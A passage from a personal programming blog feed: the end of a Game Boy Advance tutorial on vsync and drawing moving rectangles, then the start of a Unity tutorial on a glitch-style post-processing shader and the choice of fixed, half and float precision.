</span><span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The value at REG_VCOUNT holds the index of the current row being drawn to by the hardware. The above function simply waits until we are at an index that is beyond the height of the screen (160). If called inside VBLANK, it will block until the next VBLANK is hit. Is this awful and complete overkill? YES! It also works pretty nicely for something as simple as a moving rectangle game.</p>
<p>It’s worth noting that you are free to do any calculations you want during VDRAW (what it’s called when the hardware is not in VBLANK), as long as you don’t update the values in the screen buffer.</p>
<p>Using the above vsync() function, we can finally add some animation, since the function above not only blocks until VBLANK, but will also block until next frame:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="n">SCREEN_H</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">MakeCol</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">x</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">0</span><span class="p">));</span>
<span class="n">x</span> <span class="o">+=</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you run this, you’ll slowly see your screen get filled, 10 pixels at a time, by a lovely white color:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/fill.gif" style="width:240px;height:160px" />
<br /><br />
</div>
<p>You’ll notice that the screen doesn’t do any clearing for us at all. This is actually good news, since writing to the SCREENBUFFER array takes up cycles, and we don’t want our hardware using up any of our precious CPU time that it doesn’t have to. This means that if you wanted to say, move a rectangle across the screen instead of having the screen fill up, you also need to write black to the previous location of the rectangle:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">x</span> <span class="o">></span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="p">(</span><span class="n">SCREEN_H</span><span class="o">/</span><span class="mi">10</span><span class="p">))</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">last</span> <span class="o">=</span> <span class="n">x</span> <span class="o">-</span> <span class="mi">10</span><span class="p">;</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">last</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">last</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">));</span>
<span class="p">}</span>
<span class="n">drawRect</span><span class="p">(</span><span class="n">x</span> <span class="o">%</span> <span class="n">SCREEN_W</span><span class="p">,</span> <span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">SCREEN_W</span><span class="p">)</span> <span class="o">*</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span><span class="n">MakeCol</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">31</span><span class="p">));</span>
<span class="n">x</span> <span class="o">+=</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice I also added a bit of logic to wrap the x value when it goes off the end of the screen. This gives you a lovely white rectangle which traverses each row on your screen. If it looks like the rectangle is skipping frames, make sure the “frameskip” option in your emulator isn’t turned on.</p>
<div align="center">
<img src="/images/post_images/2017-03-31/rect.gif" style="width:240px;height:160px" />
<br /><br />
</div>
<p>Note that the gif above IS skipping frames, because capturing my gif capturing program only suports up to 30 fps, so if your game is as choppy as the gif, your frameskip option is turned on.</p>
<p>Other than that, you should be good to go!</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>Usually I’d talk about performance, but I haven’t figured out how to get a timer running on the GBA yet, so I really can’t, other than to say the snake game runs smoothly. I have no idea when I’ll post more about game boy stuff, since I have other projects that I want to get done, but hopefully this was helpful enough to get you started, and pointed at some much more detailed resources!</p>
<p>If you’re interested in the Snake game that I made for GBA, all the source is available on github <a href="https://github.com/khalladay/GBASnake">here</a>.</p>
<p>As always, if you have any questions, comments, or cat gifs, send them my way <a href="https://twitter.com/khalladay">on Twitter!</a></p>
Fixeds, Floats and a Block Damage Effect2017-03-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/03/13/GlitchFX-In-Unity<p>As you may have guessed from the everything that I post, I love cheesy rendering effects, and no surprise, that means that I’m a big fan of cyberpunk games, especially ones that really go over the top with effects. As such, I thought I’d spend some time this weekend building a classic glitch effect:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/preview.gif" /><br />
</div>
<p>It’s a very simple effect, but it’s also a perfect excuse to talk about using the correct precision for variables when writing shaders. In the <a href="http://kylehalladay.com/blog/tutorial/2017/02/21/Pencil-Sketch-Effect.html">last article I wrote</a>, I touched a bit on using texture formats that have enough precision for the data you’re storing in them; today I’m going to go over how to decide whether to use a fixed, half or float on a line to line basis when writing a shader.</p>
<p>That will come later though, first, let’s go over how the glitch effect we’re building works:</p>
<h2 id="how-it-works">How It works</h2>
<p>The first thing we’ll need to do is find some way to divide our screen up into rectangular regions, identified by a scalar value. You can do this with UV math right in the shader, but it’s much easier to play with if this is texture driven, so we’ll need to create a texture like the following:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/gs_map.png" /><br />
</div>
<p>Since this texture identifies each block with a value between 0 and 1 (the intensity of the colour), we’ll pass a second value to our shader also between 0 and 1. As the shader executes, any fragment which is in a block that has a value greater than our control value will sample the screen buffer using UVs which have had a constant value added or subtracted to them. This will keep all texture samples within a block cohesive with each other, producing the effect we want:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/offset_sample.PNG" /><br />
</div>
<p>if we use the grayscale image above however, our UV offset will always be diagonal and in the same direction, which isn’t exactly what we want. So I’m going to use the R channel as our identifier channel, and put different random values into the GB channels of the noise texture, which we’ll use to drive our UV offsets:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/col_map.png" /><br />
</div>
<p>(I wrote a quick tool to generate these types of maps, I’m not going to walk through building it, but you can grab it in the github repo <a href="https://github.com/khalladay/GlitchFX/blob/master/GlitchFX/Assets/GlitchFX/Editor/BlockDamageMapTool.cs">here</a>)</p>
<p>Then we’ll modify the effect to randomly choose which blocks to glitch, so that we don’t end up with a predictable pattern of glitchiness (which…kinda looks the opposite of glitchy), and I’ll talk a bit about some things you can do to make the whole effect look a bit more convincing (imo), and different ways you can extend it. I’ll also sprinkle in some notes about optimization.</p>
<p>So let’s get started!</p>
<h2 id="getting-something-on-screen">Getting Something On Screen</h2>
<p>I always try to get something on screen as fast as possible when I work, both so that I can verify that my code is doing what I think it should be, and to make sure that what I’m building actually looks good. So let’s start this effect the same way, by just getting the glitch effect working and distorting the whole screen.</p>
<p>Like usual, we’re going to be making a post effect, so we need to start with a bit of scaffolding in C#. Unlike past articles, this effect is simple enough that we don’t need to set up any extra cameras, we just need to make sure that blit to the screen using our effect material:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="p">[</span><span class="nf">RequireComponent</span><span class="p">(</span><span class="k">typeof</span><span class="p">(</span><span class="n">Camera</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">GlitchFX</span><span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">glitchAmount</span> <span class="p">=</span> <span class="m">0.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Texture2D</span> <span class="n">blockTexture</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Shader</span> <span class="n">_glitchShader</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Material</span> <span class="n">_glitchMat</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchShader</span> <span class="p">=</span> <span class="n">Shader</span><span class="p">.</span><span class="nf">Find</span><span class="p">(</span><span class="s">"Hidden/GlitchFX/GlitchFX_Shift"</span><span class="p">);</span>
<span class="n">_glitchMat</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">_glitchShader</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_GlitchMap"</span><span class="p">,</span> <span class="n">blockTexture</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">source</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">destination</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">destination</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">glitchAmount</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">glitchAmount</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchAmount"</span><span class="p">,</span> <span class="n">glitchAmount</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>We’ll revisit this script later on when we want to tweak the effect, but for now, this is all we’ll need to get going. Next up, we need to get our shader set up. I’m going to assume that you can set up most of the material file yourself, and skip right to the fragment shader. If you’re lost, the shader is also in the github repo <a href="">here</a></p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span><span class="p">);</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Alright, now we’re cooking! If you run this now you should get a full screen of glitchy goodness! If you’re seeing weirdness around the edges of the blocks like this:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/filtering.png" style="width:300px;height:250px;" /><br />
</div>
<p>Make sure that you’ve set your noise map texture to “point” filtering.</p>
<h2 id="optimization-notes-part-1">Optimization Notes Part 1</h2>
<p>While what we’re doing is very straightforward, it’s worth taking a minute to talk about a quick optimization point. Notice that I’m only grabbing 2 channels from the texture. This is going to be very slightly faster than grabbing the whole texture, or grabbing just 1 channel and creating a fixed2 from that.</p>
<p>You can test this yourself the same way I did, and run the above post process effect 101 times per frame, like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">source</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">destination</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">t</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">source</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">source</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="m">50</span><span class="p">;</span> <span class="p">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">source</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">source</span><span class="p">,</span> <span class="n">destination</span><span class="p">,</span> <span class="n">_glitchMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">t</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>On my iPhone 6, the performance impact was too small to see without doing something like the above, and even in the above stress test, we’re talking about a difference of about 2 ms. It’s not like your project will fail if you don’t know this technique, but small optimizations add up, especially when you’re trying to hit 60 fps on mobile.</p>
<p>So that covers the texture sample line, but I also mentioned that we’d pay special attention to the precision of variables in this post, so let’s talk about why the texture sample was stored in a fixed2, and not a float2, for instance. As we’ll see when we have more instructions to look at, it’s a matter of minimizing the number of times we need to cast our data to a different precision. Some functions take floats as args, so passing in a fixed will require it to be cast up into a higher precision type or vice versa.</p>
<p>It’s also worth looking at the glsl that will be generated by Unity’s shader compiler for the above shader:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">varying</span> <span class="n">highp</span> <span class="n">vec2</span> <span class="n">xlv_TEXCOORD0</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">main</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_1</span><span class="p">;</span>
<span class="n">tmpvar_1</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">xlv_TEXCOORD0</span><span class="p">);</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">P_2</span><span class="p">;</span>
<span class="n">P_2</span> <span class="p">=</span> <span class="p">(</span><span class="n">xlv_TEXCOORD0</span> <span class="p">+</span> <span class="n">tmpvar_1</span><span class="p">.</span><span class="n">xy</span><span class="p">);</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_3</span><span class="p">;</span>
<span class="n">tmpvar_3</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">P_2</span><span class="p">);</span>
<span class="n">gl_FragData</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="p">=</span> <span class="n">tmpvar_3</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that by default, sampler2Ds in CG code are turned into low precision samplers in GLSL by Unity. GLSL lowp, mediump and highp float precision qualifiers map to CG’s fixed, half and float datatypes. This means that if we used a float2 instead of a fixed2 to store the texture lookup, we’d need to the value returned by the tex2D call up into float precision. You can see this happen if you change glitch to a float2 and examine the glsl again:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">uniform</span> <span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">varying</span> <span class="n">highp</span> <span class="n">vec2</span> <span class="n">xlv_TEXCOORD0</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">main</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">glitch_1</span><span class="p">;</span>
<span class="n">lowp</span> <span class="n">vec2</span> <span class="n">tmpvar_2</span><span class="p">;</span>
<span class="n">tmpvar_2</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">xlv_TEXCOORD0</span><span class="p">).</span><span class="n">xy</span><span class="p">;</span>
<span class="n">glitch_1</span> <span class="p">=</span> <span class="n">tmpvar_2</span><span class="p">;</span>
<span class="n">highp</span> <span class="n">vec2</span> <span class="n">P_3</span><span class="p">;</span>
<span class="n">P_3</span> <span class="p">=</span> <span class="p">(</span><span class="n">xlv_TEXCOORD0</span> <span class="p">+</span> <span class="n">glitch_1</span><span class="p">);</span>
<span class="n">lowp</span> <span class="n">vec4</span> <span class="n">tmpvar_4</span><span class="p">;</span>
<span class="n">tmpvar_4</span> <span class="p">=</span> <span class="nf">texture2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">P_3</span><span class="p">);</span>
<span class="n">gl_FragData</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="p">=</span> <span class="n">tmpvar_4</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This may look like a trivial change (in fact, the PowerVR Shader Editor doesn’t even recognize it as an extra instruction), but the performance impact of minimizing precision casts is very real. Again, I highly recommend you write some tests to try it out for yourself, using the same method as before (running it 100 times per frame). If you do, you’ll notice that the cost of an individual cast isn’t that high, but across a whole project, these costs can add up.</p>
<p>Also, since we’re not sampling from a half precision or floating point texture, there really isn’t anything to be gained from using anything but a fixed here. If you need to sample from one of those textures, you can add a suffix to your sampler2D uniform to get a half or full precision sampler:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D_float</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="n">sampler2D_half</span> <span class="n">_GlitchMap</span><span class="p">;</span></code></pre></figure>
<p>Ok, that’s a lot of analysis for now, let’s do something a bit more flashy.</p>
<h2 id="finishing-the-glitch-effect">Finishing the Glitch Effect</h2>
<p>So far our post process shader is assuming that we want to distort the entire screen RIGHT NOW, but that isn’t how the glitch effect we want works, we want to distort different parts of the screen at different times.</p>
<p>I’m going to start by using the value of the red channel in our map as the noise value for the blocks. This will give us an effect that follows a predictable pattern, but it will be way more convincing than what we have now. Once this is working, we can worry about adding randomness.</p>
<p>So what we need to do is pass a float value to the shader, and compare the value of each block against this value. Blocks which have a value less than or equal to our passed in control value will use the offset UVs (appearing glithed), and blocks with a value greater will appear normal. This means that if we pass a value of 1.0 to our control value, all blocks will glitch because no value can be greater than 1.</p>
<p>If all GPUs were good at branching, this could be written like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span> <span class="p">>=</span> <span class="n">_GlitchAmount</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">uvShift</span> <span class="p">*=</span> <span class="m">0.0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>But since we can’t be sure what device this effect will need to run on, I’m going to replace the conditional with a bit of math that accomplishes the same thing:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>All we’re doing here is comparing our two values with a subtract and rounding up to the nearest whole number, this only works because we know that both numbers have the same range (0 to 1). However, this has an edge case: if your glitch value is exactly 1.0, this calculation can result in a value of -1, which would distort part of the image even when we want no glitching, which is obviously incorrect. I’m going to add a max to the calculation here to resolve this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="nf">max</span><span class="p">(-</span><span class="m">0.99</span><span class="p">,</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">));</span></code></pre></figure>
<p>In a real project though, you’ll want to pre-process your glitch map to make sure it doesn’t have any 1.0 blocks so that you can get rid of this extra instruction and save some performance.</p>
<p>You may have noticed if you run this right now, you get some weird colours in your glitched image, for me, this looked like way more brown than there should have been:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/edge.PNG" style="width:300px; height:250px;" /><br />
</div>
<p>This is because when we add our UV offset to our UV coordinates, we’re ending up sampling from outside of the area of the screen buffer. The buffer is set to clamp at the border, meaning what we’re seeing is a lot of fragments picking up pixels from the edge of our image. Since we don’t care about the integer value of our UV coordinates (and in fact want to get rid of them), we can add a frac() function to our shader and get home-grown UV wrapping.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span></code></pre></figure>
<p>Put all this together and you get an effect that looks like this as the _GlitchAmount value pans from 0 to 1:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/pan3.gif" /><br />
</div>
<h2 id="optimization-notes-part-2">Optimization Notes Part 2</h2>
<p>We have another line of shader code now, so let’s talk about</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"> <span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="nf">ceil</span><span class="p">(</span><span class="nf">max</span><span class="p">(-</span><span class="m">0.99</span><span class="p">,</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">));</span></code></pre></figure>
<p>First of all, it’s almost always a bad idea to use anything but floats to hold UV coordinates. The other datatypes don’t have enough precision to accurately sample a texture, which is what you want them to do 99% of the time.. We don’t really care about whether or not our shifted coordinates are super accurate though, so the question of what data type to use comes down to raw performance.</p>
<p>Boringly enough this doesn’t actually change anything, because _GlitchAmount is a float, and the tex2D() function expects the uv coordinates that get passed to it to be floats, so no matter what we start with, we very quickly need to cast our variable up to a float anyway, so we may as well keep to the standard rule of “uv math gets done in full precision” here too.</p>
<p>It’s worth noting that although we’re working with fixeds a lot in this post, on newer hardware, most GPUs have full support for halfs and will go so far as to ignore the fixed qualifier and do everything in halfs and floats. Check the specifics for your target devices, but it’s usually safe to say that if your iOS device supports metal, it’s safe to use halfs instead of fixeds. I’m under the impression that this is even more common on Desktops.</p>
<p>Alright, back to making things look cool!</p>
<h2 id="randomizing-the-glitch">Randomizing the Glitch</h2>
<p>Our effect is looking better, but it still isn’t really “glitchy” is it? If we leave our glitch value along, the effect stays static, distorting fixed blocks on the screen. As well, even with the _GlitchAmount value changing, our effect follows a predictable pattern, always glitching blocks in the same order. It’s time to make this a bit more random.</p>
<p>To do this, we’re going to need to be able to get a random value for each block to use instead of the red channel intensity to decided when to glitch a block. Further, we’re going to want this random value to not only be uniform across an entire block, we also want to be able to control when the random values change so that we can control how fast our effect updates.</p>
<p>Luckily, the commonly copy/pasted one liner for generating random numbers in a shader takes two parameters as input:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="kt">float</span> <span class="nf">rand</span><span class="p">(</span><span class="n">float2</span> <span class="n">co</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nf">frac</span><span class="p">(</span><span class="nf">sin</span><span class="p">(</span><span class="nf">dot</span><span class="p">(</span><span class="n">co</span><span class="p">.</span><span class="n">xy</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="m">12.9898</span><span class="p">,</span> <span class="m">78.233</span><span class="p">)))</span> <span class="p">*</span> <span class="m">43758.5453</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>So we’re going to use that, and pass the red channel value as the first component of co, and pass a uniform float that we send from c# to the shader as the second component. It’s beyond the cope of this post to talk about how this one liner works, but if you have a spare second it’s definitely worth googling.</p>
<p>This time we’re using floats because we want more potential variety in our random number. Using a half or a fixed reduces the number of values that can be represented between 0 and 1. It might make a huge difference if you use halfs here instead of floats, but it will make some, and as you’ll see in a second, we would need to cast it up to a float back in our fragment function anyway.</p>
<p>Our shader now looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_GlitchMap</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_GlitchAmount</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_GlitchRandom</span><span class="p">;</span>
<span class="kt">float</span> <span class="nf">rand</span><span class="p">(</span><span class="n">float2</span> <span class="n">co</span><span class="p">)</span>
<span class="p">{</span>
